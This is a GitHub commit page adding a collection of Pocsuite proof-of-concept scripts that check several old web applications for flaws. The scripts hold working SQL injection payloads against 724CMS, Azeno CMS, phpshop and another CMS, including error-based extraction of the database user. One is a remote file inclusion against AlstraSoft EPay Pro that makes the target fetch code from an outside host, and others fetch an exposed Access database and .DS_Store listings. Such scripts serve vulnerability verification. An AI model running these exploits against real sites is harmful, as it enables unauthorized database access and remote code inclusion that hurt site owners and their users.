Skip to content

Commit 55fcf0f

Browse files
committed
add all
1 parent edc191d commit 55fcf0f

File tree

96 files changed

+6447
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

96 files changed

+6447
-0
lines changed

Diff for: .DS_Store

20 KB
Binary file not shown.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,48 @@
1+
#!/usr/bin/env python
2+
# coding: utf-8
3+
4+
from pocsuite.net import req
5+
from pocsuite.poc import POCBase, Output
6+
from pocsuite.utils import register
7+
8+
class TestPOC(POCBase):
9+
vulID = 'SSV-65307' # vul ID
10+
version = '1'
11+
author = ['hh']
12+
vulDate = '2008-04-07'
13+
createDate = '2015-10-16'
14+
updateDate = '2015-10-16'
15+
references = ['https://www.exploit-db.com/exploits/5400/']
16+
name = '724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability'
17+
appPowerLink = 'http://724cms.com/'
18+
appName = '724cms'
19+
appVersion = '<= 4.01'
20+
vulType = 'SQL Injection'
21+
desc = '''
22+
724Networks 724CMS 4.01及其早期版本的index.php存在SQL注入漏洞。远程攻击者通过ID参数来执行任意SQL命令。
23+
'''
24+
# the sample sites for examine
25+
samples = ['']
26+
27+
def _verify(self):
28+
result = {}
29+
payload = "/index.php?ID=1 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
30+
verify_url = self.url + payload
31+
content = req.get(verify_url).content
32+
if 'fae0b27c451c728867a567e8c1bb4e53' in content:
33+
result['VerifyInfo'] = {}
34+
result['VerifyInfo']['URL'] = verify_url
35+
return self.parse_verify(result)
36+
37+
def _attack(self):
38+
return self._verify()
39+
40+
def parse_verify(self, result):
41+
output = Output(self)
42+
if result:
43+
output.success(result)
44+
else:
45+
output.fail('Internet Nothing returned')
46+
return output
47+
48+
register(TestPOC)
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
#!/usr/bin/env python
2+
# coding: utf-8
3+
4+
import re
5+
from pocsuite.net import req
6+
from pocsuite.poc import Output, POCBase
7+
from pocsuite.utils import register
8+
9+
class AlstraSoft_EPay_Pro_Remote_File_Include(POCBase):
10+
vulID = '78990'
11+
version = '1'
12+
vulDate = '2005-04-01'
13+
author = ' '
14+
createDate = '2015-12-16'
15+
updateDate = ' '
16+
references = ['http://www.sebug.net/vuldb/ssvid-78990']
17+
name = 'AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability'
18+
appPowerLink = ''
19+
appName = 'AlstraSoft EPay Pro'
20+
appVersion = '2.0'
21+
vulType = 'Remote File Inclusion'
22+
desc = ''
23+
samples = ['']
24+
25+
26+
def _attack(self):
27+
return self._verify()
28+
29+
30+
def _verify(self):
31+
result = {}
32+
vul_url = '%s/epal/index.php?view=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33+
response = req.get(vul_url).content
34+
35+
if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36+
result['VerifyInfo'] = {}
37+
result['VerifyInfo']['URL'] = self.url
38+
39+
40+
return self.parse_attack(result)
41+
42+
43+
def parse_attack(self, result):
44+
output = Output(self)
45+
46+
if result:
47+
output.success(result)
48+
else:
49+
output.fail('failed')
50+
51+
return output
52+
53+
register(AlstraSoft_EPay_Pro_Remote_File_Include)
+52
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,52 @@
1+
#!/usr/bin/env python
2+
# -*- coding:utf-8 -*-
3+
import re
4+
from pocsuite.net import req
5+
from pocsuite.poc import Output, POCBase
6+
from pocsuite.utils import register
7+
8+
9+
class Angelo_emlak_Database_Found(POCBase):
10+
vulID = '67229'
11+
version = '1'
12+
vulDate = '2010-04-27'
13+
author = 'anonymous'
14+
createDate = '2015-11-15'
15+
updateDate = '2015-11-15'
16+
references = ['http://www.sebug.net/vuldb/ssvid-67229']
17+
name = 'Angelo-emlak 1.0 - Database Disclosure Vulnerability'
18+
appPowerLink = ''
19+
appName = 'Angelo-emlak'
20+
appVersion = ' '
21+
vulType = 'Database Found'
22+
desc = 'Angelo-Emlak在web根目录下保存敏感信息,但缺乏足够的访问控制,远程攻击者可以通过直接向veribaze/angelo.mdb发出请求,下载数据库。'
23+
samples = ['http://burdurdaemlak.com']
24+
25+
26+
def _attack(self):
27+
return self._verify()
28+
29+
30+
def _verify(self):
31+
result = {}
32+
vul_url = '%s/veribaze/angelo.mdb' % self.url
33+
response = req.get(vul_url).content
34+
35+
if re.search('Standard Jet DB', response):
36+
result['VerifyInfo'] = {}
37+
result['VerifyInfo']['URL'] = self.url
38+
39+
return self.parse_attack(result)
40+
41+
42+
def parse_attack(self, result):
43+
output = Output(self)
44+
45+
if result:
46+
output.success(result)
47+
else:
48+
output.fail('failed')
49+
50+
return output
51+
52+
register(Angelo_emlak_Database_Found)

Diff for: Apple Macintosh OS X .DS_Store 信息泄露漏洞.py

+62
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
#!/usr/bin/env python
2+
# coding: utf-8
3+
import re
4+
5+
from pocsuite.net import req
6+
from pocsuite.poc import POCBase, Output
7+
from pocsuite.utils import register
8+
9+
from ds_store import DSStore
10+
11+
class TestPOC(POCBase):
12+
vulID = '1729' # vul ID
13+
version = '1'
14+
author = ['ricter']
15+
vulDate = '2015-03-09'
16+
createDate = '2015-03-09'
17+
updateDate = '2015-03-09'
18+
references = ['http://www.securityfocus.com/bid/3324/discuss']
19+
name = 'Apple Macintosh OS X .DS_Store Information Disclosure'
20+
appPowerLink = 'http://www.apple.com'
21+
appName = 'Apple Macintosh OS X'
22+
appVersion = 'all version'
23+
vulType = 'Information Disclosure'
24+
desc = '''
25+
在开发过程中开发者可能会把 .DS_Store 文件上传到网站上导致
26+
信息泄露漏洞。
27+
'''
28+
29+
samples = ['']
30+
install_requires = ['ds_store==1.0.1']
31+
32+
def _attack(self):
33+
return self._verify()
34+
35+
def _verify(self):
36+
result = {}
37+
url = '%s/.DS_Store' % self.url
38+
response = req.get(url).content
39+
filelist = []
40+
if '\x00\x00\x00\x01\x42\x75\x64\x31' in response:
41+
try:
42+
with DSStore.open(response, 'r+') as obj:
43+
for i in obj:
44+
filelist.append(i.filename)
45+
except Exception, e:
46+
print '[-] Error: %s' % str(e)
47+
result['FileInfo'] = {}
48+
result['FileInfo']['Filename'] = url
49+
result['FileInfo']['Content'] = set(list(filelist))
50+
51+
return self.parse_attack(result)
52+
53+
def parse_attack(self, result):
54+
output = Output(self)
55+
if result:
56+
output.success(result)
57+
else:
58+
output.fail('Internet nothing returned')
59+
return output
60+
61+
62+
register(TestPOC)

Diff for: Azeno CMS SQL Injection Vulnerability.py

+45
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
#!/usr/bin/env python
2+
# coding: utf-8
3+
4+
from pocsuite.net import req
5+
from pocsuite.poc import POCBase, Output
6+
from pocsuite.utils import register
7+
8+
class TestPOC(POCBase):
9+
vulID = 'SSV-67893' # vul ID
10+
version = '1'
11+
author = 'hzr'
12+
vulDate = '2010-03-13'
13+
createDate = '2015-10-23'
14+
updateDate = '2015-10-23'
15+
references = ['https://www.exploit-db.com/exploits/11711/']
16+
name = 'Azeno CMS - SQL Injection Vulnerability'
17+
appPowerLink = 'N/A'
18+
appName = 'Azeno'
19+
appVersion = 'N/A'
20+
vulType = 'SQL Injection'
21+
desc = '''
22+
Azeno CMS的/admin/index.php 文件"id" 变量没有进行过滤,造成SQL注入
23+
'''
24+
# the sample sites for examine
25+
samples = ['']
26+
27+
def _verify(self):
28+
output = Output(self)
29+
result = {}
30+
#根据Pocsuite格式要求,定义一个特殊输出字符串,验证sql注入是否成功
31+
payload = "/admin/index.php?id=-1 UNION SELECT 1,CONCAT(0x7165696a71,CAST(md5(23333) AS CHAR),0x20),3,4,5,6,7 FROM dc_user"
32+
verify_url = self.url + payload
33+
content = req.get(verify_url).content
34+
if "qeijq0ba7bc92fcd57e337ebb9e74308c811f" in content:
35+
result['VerifyInfo'] = {}
36+
result['VerifyInfo']['URL'] = verify_url
37+
output.success(result)
38+
else:
39+
output.fail('SQL Injection Failed')
40+
return output
41+
42+
def _attack(self):
43+
return self._verify()
44+
45+
register(TestPOC)
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
#!/usr/bin/env python
2+
# coding: utf-8
3+
import re
4+
from pocsuite.api.request import req
5+
from pocsuite.api.poc import register
6+
from pocsuite.api.poc import Output, POCBase
7+
8+
9+
class TestPOC(POCBase):
10+
vulID = '' # ssvid
11+
version = '1.0'
12+
author = ['kenan']
13+
vulDate = ''
14+
createDate = '2016-06-06'
15+
updateDate = '2016-06-06'
16+
references = ['http://www.seebug.org/vuldb/ssvid-']
17+
name = ''
18+
appPowerLink = ''
19+
appName = ''
20+
appVersion = ''
21+
vulType = ''
22+
desc = '''
23+
'''
24+
samples = ['']
25+
install_requires = ['']
26+
#请尽量不要使用第三方库,必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段
27+
28+
def _attack(self):
29+
result = {}
30+
#Write your code here
31+
vulurl = "%s" % self.url
32+
payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
33+
resp = req.get(vulurl+ payload)
34+
re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
35+
vulurl1 = "%s/?m=city.getSearch&index=xx" % self.url
36+
payload1 = {"key":"xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx"}
37+
resp1 = req.post(vulurl,data =payload1)
38+
re_result1 = re.findall(r'~~~(.*?)~~~', resp1.content, re.S|re.I)
39+
if re_result :
40+
result['VerifyInfo'] = {}
41+
result['VerifyInfo']['URL'] = vulurl
42+
result['VerifyInfo']['Payload'] = payload
43+
return self.parse_output(result)
44+
if re_result1 :
45+
result['VerifyInfo'] = {}
46+
result['VerifyInfo']['URL'] = vulurl1
47+
result['VerifyInfo']['Payload'] = payload1
48+
return self.parse_output(result)
49+
50+
def _verify(self):
51+
result = {}
52+
return self._attack()
53+
54+
def parse_output(self, result):
55+
#parse output
56+
output = Output(self)
57+
if result:
58+
output.success(result)
59+
else:
60+
output.fail('Internet nothing returned')
61+
return output
62+
63+
64+
register(TestPOC)

Diff for: CMS phpshop 2.0 - SQL Injection Vulnerability.py

+50
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,50 @@
1+
#!/usr/bin/env python
2+
# coding: utf-8
3+
4+
from pocsuite.net import req
5+
from pocsuite.poc import POCBase, Output
6+
from pocsuite.utils import register
7+
import re
8+
9+
class TestPOC(POCBase):
10+
vulID = 'SSV-77845' # vul ID
11+
version = '1'
12+
author = ['hh']
13+
vulDate = '2013-01-14'
14+
createDate = '2015-10-16'
15+
updateDate = '2015-10-16'
16+
references = ['https://www.exploit-db.com/exploits/24108/']
17+
name = 'CMS phpshop 2.0 - SQL Injection Vulnerability'
18+
appPowerLink = 'http://code.google.com/p/phpshop/downloads/list'
19+
appName = 'phpshop'
20+
appVersion = '2.0'
21+
vulType = 'SQL Injection'
22+
desc = '''
23+
?page=admin/function_list&module_id=11 id变量未正确过滤,导致SQL注入漏洞
24+
'''
25+
# the sample sites for examine
26+
samples = ['']
27+
28+
def _verify(self):
29+
result = {}
30+
target_url = "/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,CONCAT(0x7162787671,0x50664e68584e4c584352,0x716a717171),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --"
31+
response = req.get(self.url + target_url, headers=self.headers, timeout=10)
32+
content = response.content
33+
match = re.search('qbxvqPfNhXNLXCRqjqqq',content)
34+
if match:
35+
result['VerifyInfo'] = {}
36+
result['VerifyInfo']['URL'] = self.url + target_url
37+
return self.parse_attack(result)
38+
39+
def _attack(self):
40+
return self._verify()
41+
42+
def parse_attack(self, result):
43+
output = Output(self)
44+
if result:
45+
output.success(result)
46+
else:
47+
output.fail('Internet Nothing returned')
48+
return output
49+
50+
register(TestPOC)

0 commit comments

Comments
 (0)